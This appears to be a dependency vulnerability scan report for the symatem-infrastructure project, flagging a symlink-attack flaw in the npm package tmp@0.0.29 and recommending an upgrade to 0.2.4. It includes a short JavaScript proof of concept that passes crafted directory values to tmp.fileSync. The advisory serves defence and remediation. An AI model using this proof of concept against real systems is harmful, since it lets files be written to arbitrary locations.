Vulnerabilities

1 via 1 paths

Dependencies

89

Source

GitHub

Commit

a932b751

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity
new

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: caporal@1.4.0

Detailed paths

  • Introduced through: symatem-infrastructure@arlac77/symatem-infrastructure#a932b751a8e512064abea38db374039ffca8a1ef caporal@1.4.0 tabtab@2.2.2 inquirer@1.2.3 external-editor@1.1.1 tmp@0.0.29

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References